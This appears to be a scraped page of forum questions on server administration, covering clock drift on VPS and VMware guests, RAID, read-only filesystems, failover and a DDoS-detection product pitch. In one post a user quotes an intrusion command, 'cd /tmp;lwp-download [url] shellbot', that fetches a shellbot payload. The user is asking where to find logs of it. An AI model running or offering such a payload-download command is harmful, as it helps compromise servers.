System Clock Off Continuously
One of our server's system clock seems to gradually creep away from the correct time. It has been causing us a lot of issues. After one day it becomes more than one hour off. After each minute it becomes a few seconds off.
Any ideas what could be causing this? It's uptime is ~2 months so it doesn't happen when it goes offline, it happens while it is running.
Right now we have a cronjob running ntpdate every few minutes as even with the ntpd service running it would end up off by several minutes when we would check. I have a feeling this isn't a very reliable fix though.

Clock Issues With OpenVZ
I have an VPS at cheapvps.co.uk since November 2007. It has worked like a charm until a week ago. Since the massive crack from last week and the subsequent shutdown & boot, the clock on my VPS is going crazy. Clock is really accelerated, a minute in the real world equals to more than 2 minutes within the VPS. I'm having lots of problems with dates in the future, and cheapvps support team is working to get this solved with no success.

About The Clock Of The VPS At Smokyhosts
I select a vps of Smokyhosts last friday, but I found the clock of it an hour off the correct time, eg. I set the timezone to UTC, the correct NTP time is 3:00, but the clock of vps is display 2:00, It's an hour before the correct time. I think this is an error when they first set the clock of host node, I send several tickets to Smokeyhosts support, but they told me I can set to another timezone not in my country, I think this is not reasonable. and they told me they do not allow any time change requests for the hardware node even if it's error. Since the clock of VPS is an hour error, even if I can set another timezone not my country. but if I have a forum on this VPS, and user can set their own timezone settings, they would be puzzled to find what they seclectd timezone is always an hour off, I must be explain this to them? I think this is not acceptable. I understand the NTP would be impossible to all VPS, but they should ensure the host node's clock is correct relatively, now it's an hour off, I think they can correct this easily if they would like to do. another small question is when I get the vps, Mysql was installed, but the user "mysql" is not exist in system, So mysql service can't start, I add this myself, and it's ok. Now all other things looks well except the clock. their support always response quickly, i'm very satisfied with them.

Windows 2003 Clock Was Right, Now It Slow An Hour
I am running windows 2003, and I patched it with the timezone windows update, everything was fine, but when I looked today, the clock is one hour slow. But when I run my php scripts, it shows the time being correct. I thought php grabbed the time from the system? Perhaps this is just a bug with the clock, and the internal system time is correct? It is the only thing I can think of.

Time Keepting In Virtual Environments (clock Drift, Etc...)
I have worked with VMWare quite a bit, and have found that no matter what tweaking you do a clock skew of up to a minute (relative to the host clock, itself kept accurate enough via NTP) is unavoidable at times, at least for a Linux 2.6.x based guest. Do any of the common technologies allow guests to be kept more closely in sync with the host clock and so be more accurate (assuming the host's clock isn't wide of the mark, of course)? Do some of the technologies work OK with using NTPd to regulate the guest clock (under VMWare this is bad idea as it "conflicts" with VMWares own clock synchronisation method potentially making things worse than they otherwise would be). The reason for the question is that I'm playing with some code that will run on a few different locations and while I can use an external source to fake a clock to the accuracy I want (+/- a second or two) most of the time, I wouldn't have to if I could rely on the VM's wall-clock being that accurate. If the project goes anywhere (my toy projects usually don't!) it would use real machines, but at this stage I'd rather avoid that expense/hassle.

KVM Over IP System
I have a few different types of servers, all of which came with their own KVMoIP setup, aka DRAC and iLO which have worked only so so since their deployment. The HP iLO has performed absolutely flawlessly but the DRAC on the other hand has been nothing less than a complete nightmare. I'm looking for a KVM over IP system that we can connect to multiple servers, mainly Dell, that is 100% reliable and completely stable. Not something that will be giving Java errors randomly when you actually need it to work. So far I've came across the Raritan Dominion KX II which looks pretty promising. Is there any other KVM over IP systems or manufactures that I should look into? Has anyone used this and can you comment about its reliability?

System Logs
I keep receiving hacking attempts from someone accessing my server and running commands like these: Code: hubberfix sh -c cd /tmp;lwp-download [url] shellbot I cannot find any logs with these attempts. Or at least any with info like an IP address or host doing this. Not to sound like a noob, but where can I find logs that would tell me all the commands run on my system? FYI, I'm running Debian Sarge, and I looked in "/var/log" and I can't find much of anything.

Which Operating System
There's bloody heaps of them. Which one do I go for on my two new file servers? Which operating system out of these is the most common, has the most support, is most compatible? The server will be used to host videos and will run c-panel. A light weight OS is probably preferred but I really have no idea. Whole System Backup
I just spent over 10 hours on my node configuration (debian etch). I have installed a lot of stuff, made raid1 array, control panel, some tools, rules etc etc etc. I dont want to see that some day something crash - and I will must start over with everything. What you guys suggest as backup method, maybe some how-to backup WHOLE system with all files, raid configuration etc. I dont need incremental backups at all - I just want to save/backup current system, and maybe restore if something bad would happen.

Server Became Read Only System
I had a linux server (CentOs 5, mysql5, php5, directadmin). I had problems with apache few days ago, that's why i hire sys. admin who tweak the system (install the PAE kernel), and some more configurations, and during last 7-8 days server work w/o any downtime (before this server had 1-2 downtimes per day-> OOM killer.) Now i had only ssh access (emails, directadmin access - give "wrong password" answer). As told my sys.admin It became read only system. VZPP - System Usage
I have a VPS with 512mb guaranteed memory. From VZPP, my Resource Capacity(System Usage)is using >50% even when I don't have any active sites at all! Support staff trying to convince me is normal as apache, cpanel etc are using resources. Yes, I agreed they use up resources. But at >50%? What will happen if I just have an active site, wouldn't it hit 100% and I have to upgrade immediately for more resources? I think is more of nodes or some setup issues then "is normal". What is normal "system usage" for new VPS with no website on it.

Changing System Date
We have a server located in USA. We have hosted an application for online booking of travel tickets. The customer wanted to change the system date to IST instead of EDT which we did. Now, if we try to change the system date to a future date in order to test our application, the date automatically resets to the current date. This happens only if we have the timezone as IST. If we change the system date to EDT, then after changing the system date, it does not reset automatically. It changes only if we modify it manually. However, if we change the timezone to IST, then the system date resets automatically back to the current date. We have stopped the W32 Time service and also blocked the port 123. We have also disabled the automatic synchronization with the internet time server.

Setting Up RAID System
I've never loaded Linux onto a RAID array before, I have an Adaptec 2105S card, with 3 x SCSI HDD's attached, in a RAID5 setup. When I boot the Cent OS Server 4.4 CD, it says I don't have any hard drives attached. I am then prompted to select a device driver, but it does not show up in the list. The options in the list are: - Adaptec AACRAID (aacraid) - Adaptec AHA-152x (aha152x) - Adaptec AHA-2740, 28xx, 29xx, 39xx (aic7xxx) - Adaptec Aic79xx SCSI Host Bus Adapter driver (aic79xx) - Adaptec SAS/SATA Host Bus Adapter driver (adp94xx) It says if I have a driver disk, hit F2. The problem is that I don't have a driver disk. The manual tells me to visit [url]for drivers, but it's not offline. When I go to the download section for the card [url]the only *nix option, is SuSE.

Raid 5 On System Volume
Ive just bought a Power Edge 2600 and I decided to setup the three disks that came with it as raid 5 (within PERC) and installed Win2003 Std. Works great. But while browsing one of my MCSA books I read that using a raid 5 configuration on the system / boot volume it is next to useless as it offers no redundancy should a volume fail. (With respect to easily booting it back up should a volume fail) I'm going to use Raid 1 (again with PERC) across two other drives for my exchange data but I'm worried about my system volume. Is my MS book talking about the OS not been able to rebuild data should a volume fail or is this a general rule for raid 5 setups?

System Error 53 Samba
I was wondering if anyone has came across this error when dealing with SAMBA. [url]is the error and the 'fix'. I have about 50users that can connect just fine, running sp2 (xp pro) but some other users that have xp home or media center can't. There running sp2 and they still get the above error. System Software Protection For DDoS
We are a Brazilian WebHosting company and ran through this years with many and many DDoS issues against our network, causing a lot of downtime and losses for us and our customers. Along these years our company developed a lot of software to fight against those attacks and completely block them. We thought about offering in the future a service to block attacks on a whole network for Web Hosting companies that are having those kind of problems. I will expose here what these softwares will do and I would like to get feedbacks from everyone if its interesting or if its not and the reason. Software will ... a) Detect any IP that is port scanning the network. - This software detects if one specific IP is sending more than X packets in a given amount of time. b) Detect any IP that is attacking the network with DDoS. - This software detects if one specific IP is sending more than X bytes in a given amount of time If "a" happens the software will, - Send a customized e-mail to the owner of the ASN (The owner of the source IP) telling that the IP x is scanning the network. Will send a complete log with the scan including the source and the destination IP. Will not stop to send the e-mail until the scan stop. If "b" happens the software will, - Send a customized e-mail to the owner of the ASN (The owner of the source IP) telling that the IP x is attacking the network. Will send a complete log with the scan including the source and the destination IP. Will not stop to send the e-mail until the attack stop. - The software will input a Blackhole on the destination IP at the border/core router. The IP with the blackhole will not exist for people outside your local country (This will not affect customer if their users are in your local country and will block attackers outside your country). - The software will block source IPs to that destionation IPs based on a specific software that we have developed and cannot tell how it works. This is the must of the system, works very well and to not affect customer/end users from accessing the server/network. ------------------------------------------------------------ The requirements for this system to work are, - Server with two NICs. One connected to the border in promiscous mode and another to access the server (required) - The announce of the BGP on your own border (optional). If you do not have this, the software that will input the Blackhole on the destination IP will not work. ------------------------------------------------------------ We run a Nagios monitoring system that alert us about the incoming/outcoming bandwidth, so we always know if we are fine or if we are under an attack. We get a copy of the e-mails sent to the owners of the ASNs to keep track if the system is either working or not. Please tell me what do you think about a software like this and if you would buy something like this.

Redundant Apache (failover System)
I currently own several servers: let's say sites on 3 of those servers rely on a website that sits on server 4 If server 4 goes offline, then servers 1 2 and 3 suffer a lack of usability. The website on server 4 is very small and fast, but receives several hundred thousand visits a day I figured it would be a good idea to replicate that website on each of my servers, but I'm unsure about how to set up a good redundancy system.. Using several nameservers doesn't work as expected (visitors are randomly sent to one of the nameservers, in no particular order)

Ticket System And WHM And Cpanel
I have VPS having whm/cpanel base, i also install RT ticket system, it install successfully, same way i did on 5 other server its ok, but on VPS due to apache different configuration it gives me. You haven't yet configured your webserver to run RT. You appear to have installed RT's web interface correctly, but haven't yet configured your web server to "run" the RT server which powers the web interface. The next step is to edit your webserver's configuration file to instruct it to use RT's mod_perl, FastCGI or SpeedyCGI handler.

Which Content Management System (CMS)
I wondered which Content Management System (CMS) is the best for a website? I read that there are many to choose from, examples are Wordpress, Drupal, Joomla etc. Which CMS is more SEO Optimised? Th website I will be setting up will be of the same genre as the following website startutor.sg. Therefore, I am wondering what CMS to use. I thought of designing the website using AI or PSD and asked someone to code them (not sure of the terminology used) for me as I don't know anything about CSS, HTML etc.

Read-only System 3rd Time
I have brand new server with CentOS 5.3 and latest CentOS kernel (2.6.18-128.1.10.el5PAE). I have brand new HDDs with no errors (HDDs have only 1000 power-on-hours, server CPU temperature is normal - between 35-42 C). My server went read-only without any reason. I need to fsck main / partition (/home is separated) and it cleaned journal, then server became online. After 2 weeks it happens again - I did again fsck on / partition and it recovered journal as before. I decided to ask Data Center to replace RAID-1 card and memory - they did it. After 3 weeks server went read-only again. I ssh into server and saw that kswapd0 process is using 100% cpu and load is over 170. After fsck it recovered journal on / and server is again available.
